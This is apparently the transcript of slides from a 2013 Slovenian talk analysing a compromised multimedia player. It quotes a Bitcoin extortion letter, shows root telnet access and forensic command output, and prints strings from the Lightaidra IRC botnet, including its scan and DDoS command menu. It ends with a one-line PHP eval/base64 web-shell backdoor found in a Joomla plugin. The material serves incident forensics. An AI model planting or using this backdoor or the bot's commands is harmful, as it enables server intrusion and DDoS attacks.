2013 Kdo najde bota
24
-
Upload
tadej-hren -
Category
Internet
-
view
96 -
download
3
description
Analiza zlorabljenega multimedijskega predvajalnika
Transcript of 2013 Kdo najde bota
Dear xxx friends,I’m DarkRobinHood, me and my friends we live in the Internet environments.Like my namesake used me to give equity in this world, I don’t like to steal, perhaps I prefer to invite people like you that works in the financial and economic markets, in general on the freedom and democracy’s, coming to us. The increased taxes, your arrogance and your injustice way to take money from us, only to deceive people that you are doing a honest job, got my attention.I’d like to invite you, with kindness, to give 75BTC before 12:00(GMT+1) on 10/16/2012 to the next Bitcoin Address: 1k966rggo3h85URb5unrXexxxxxxxxxxxxxxx . This money is going to be used for our noble cause. If you don’t get my apeal we’ll find ourselves in a position to gap you, to kick you out of our country.Showing that I’m not talking nosense, even this night you will have a small taste of what it will happen to you. My honor doesn’t let me to abey you in such way, it should be a lesson for you of thinking before you do something.Sincerely, Dark Robin Hood
$ nmap 89.xxx.xxx.xxx
Starting Nmap 5.00 ( http://nmap.org ) at 2012-10-18 13:27 CESTInteresting ports on 89.xxx.xxx.xxx:Not shown: 991 closed portsPORT STATE SERVICE23/tcp open telnet25/tcp filtered smtp80/tcp open http135/tcp filtered msrpc139/tcp filtered netbios-ssn445/tcp filtered microsoft-ds1025/tcp filtered NFS-or-IIS
Nmap done: 1 IP address (1 host up) scanned in 1.26 seconds
$ telnet 89.xxx.xxx.xxxTrying 89.xxx.xxx.xxx...Connected to 89.xxx.xxx.xxx.Escape character is '^]'.Venus login: rootwarning: cannot change to home directory
BusyBox v1.1.3 (2010.09.07-08:50+0000) Built-in shell (ash)Enter 'help' for a list of built-in commands.
# uname -aLinux Venus 2.6.12.6-VENUS #323635 Tue Sep 7 16:49:31 CST 2010 mips unknown
# find / -ctime -10 –print # ps –ef# find / -mtime -5 –ls # lsof –np PID# find / -amin -120 –print # lsof –ni TCP:22# stat somefile # pstree -aAp# cat .bash_history # last -i# crontab # file somefile.bin# ls –lAct # strings somefile.bin# ls –l /proc/PID/ # less /var/log/secure# chkrootkit # less /var/log/access.log# rkhunter # netstat -anpt
# netstat -aenActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN tcp 0 1 89.xxx.xxx.xxx:4229 165.91.24.5:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1457 165.91.24.80:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:4935 165.91.24.22:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2247 165.91.24.76:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:3836 165.91.24.42:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:3523 165.91.24.41:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2127 165.91.24.60:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:5641 37.xx.xx.xx:65535 ESTABLISHEDtcp 0 1 89.xxx.xxx.xxx:2580 165.91.24.126:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2768 165.91.24.77:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:4224 165.91.24.39:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1981 165.91.24.16:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2496 165.91.24.110:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2500 165.91.24.30:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:4526 165.91.24.70:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2720 165.91.24.93:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:4865 165.91.24.4:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:3356 165.91.24.26:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1659 165.91.24.1:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1786 165.91.24.96:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1981 165.91.24.17:23 SYN_SENT
# ps aux PID Uid VmSize Stat Command PID Uid VmSize Stat Command 1 root 380 S init 2 root SWN [ksoftirqd/0] 3 root SW< [events/0] 4 root SW< [khelper] 5 root SW< [kthread] 6 root SW< [kblockd/0] 7 root SW [khubd] 8 root SW [rpc-1] 9 root SW [rpc-3] 10 root SW [pdflush] 11 root SW [pdflush] 13 root SW< [aio/0] 14 root SW< [cifsoplockd] 15 root SW< [cifsdnotifyd] 12 root SW [kswapd0] 16 root SW [eth0] 17 root SW [mtdblockd] 29 root 384 S init 30 root 384 S init 33 root 384 S init
181 root 224 S ./RootApp DvdPlayer 182 root 224 S ./RootApp DvdPlayer 3191 root 184 S msx 3245 root 428 S inetd 24399 root Z [msx]25360 root 7780 R DvdPlayer -s power 25361 root 224 S ./RootApp DvdPlayer 25362 root 7780 S DvdPlayer -s power 25363 root 7780 S N DvdPlayer -s power 25364 root 7780 S N DvdPlayer -s power 25376 root 7780 S DvdPlayer -s power 25377 root 7780 S DvdPlayer -s power 25381 root 7780 S DvdPlayer -s power 25382 root 7780 S DvdPlayer -s power 25383 root 7780 S DvdPlayer -s power 25386 root 7780 S DvdPlayer -s power 25387 root 7780 S DvdPlayer -s power 25388 root 7780 S DvdPlayer -s power 25389 root 7780 S DvdPlayer -s power 25390 root 7780 S DvdPlayer -s power 25391 root 7780 S DvdPlayer -s power 25392 root 7780 S DvdPlayer -s power 25393 root 7780 S DvdPlayer -s power
# ls –lA /var/run-rw-r--r-- 1 root root 45 Oct 16 10:37 .httpd_status-rw-r--r-- 1 root root 5 Oct 18 11:08 .lightpid-rw-r--r-- 1 root root 0 Oct 18 11:08 .lightscan-rw-r--r-- 1 root root 22497 Oct 18 11:02 .scan.log-rw-r--r-- 1 root root 67 Oct 18 11:07 .stats-rwxr-xr-x 1 root root 203081 Oct 18 11:09 arm-rwxr-xr-x 1 root root 204284 Oct 17 16:23 ax-rw-r--r-- 1 root root 5 Oct 17 16:23 dhcp.pid-rw-r--r-- 1 root root 6 Oct 17 16:23 inetd.pid-rwxr-xr-x 1 root root 266266 Oct 18 11:09 mips-rwxr-xr-x 1 root root 266327 Oct 18 11:08 mipsel-rwxr-xr-x 1 root root 266294 Oct 17 16:23 msx-rwxr-xr-x 1 root root 266201 Oct 17 16:23 mx-rwxr-xr-x 1 root root 195648 Oct 18 11:09 ppc-rwxr-xr-x 1 root root 196947 Oct 17 16:23 px-rwxr-xr-x 1 root root 2211 Oct 18 11:07 run.chk-rwxr-xr-x 1 root root 180529 Oct 18 11:09 sh-rwxr-xr-x 1 root root 181348 Oct 17 16:23 sx-rwxr-xr-x 1 root root 48480 Oct 18 11:09 x86_32
/tmp/etc # ftpputBusyBox v1.1.3 (2010.09.07-08:50+0000) multi-call binary
Usage: ftpput [options] remote-host remote-file local-file
Store a local file on a remote machine via FTP.
Options: -v, --verbose Verbose -u, --username Username to be used -p, --password Password to be used -P, --port Port number to be used
$ strings msx...PRIVMSG %s :[login] you are logged in, (%s).PRIVMSG %s :[!login] sorry, wrong authenthication password!...GET /n09230945.asp HTTP/1.0Host: automation.whatismyip.com%d.%d.%*s.%*s...xxxxxx.user32.com:65535/var/run/.lightpid0123456789abcdefghilmnopqrstuvzywkxABCDEFGHILMNOPQRSTUVZYWKX|:.*<>@_;:,.-+*^?=)(|AB&%$D"!wkyxzvutsrqponmlihgfedcba~123456789FUCK#aidra->%s%s %sPASSburruciaga123NICK %sUSER pwn localhost * :Lightaidra ;)TOPIC %s
PRIVMSG %s :* *** Access Commands:PRIVMSG %s :*PRIVMSG %s :* .login <password> - login to bot's party-linePRIVMSG %s :* .logout - logout from bot's party-linePRIVMSG %s :* *** Miscs CommandsPRIVMSG %s :* .exec <commands> - execute a system commandPRIVMSG %s :* .version - show the current version of botPRIVMSG %s :* .status - show the status of botPRIVMSG %s :* .help - show this help messagePRIVMSG %s :* *** Scan CommandsPRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by youPRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bugPRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes randomPRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bugPRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes randomPRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bugPRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class randomPRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bugPRIVMSG %s :* .stop - stop current operation (scan/dos)PRIVMSG %s :* *** DDos Commands:PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secsPRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86PRIVMSG %s :* .spoof <ip> - set the source address ip spoofPRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooderPRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooderPRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)PRIVMSG %s :* *** IRC Commands:PRIVMSG %s :* .setchan <channel> - set new master channelPRIVMSG %s :* .join <channel> <password> - join bot in selected roomPRIVMSG %s :* .part <channel> - part bot from selected roomPRIVMSG %s :* .quit - kill the current processPRIVMSG %s :* *** EOF
HD Moore The Wild West, https://www.youtube.com/watch? v=b-uPh99whw4
$ ls –lA /var/log/httpdtotal 42124-rw-r----- 1 root adm 15761694 2013-02-27 14:17 access_log-rw-r----- 1 root adm 23013951 2013-02-24 01:16 access_log.1-rw-r----- 1 root adm 1339351 2013-02-24 01:17 access_log.2.gz-rw-r----- 1 root adm 1412975 2013-02-17 01:17 access_log.3.gz-rw-r----- 1 root adm 1531839 2013-02-10 01:17 access_log.4.gz
184.168.27.120 - - [25/Feb/2013:16:56:07 +0100] "POST /plugins/system/dvmessages/dvmessages.php HTTP/1.1"200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
<?phpdefined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
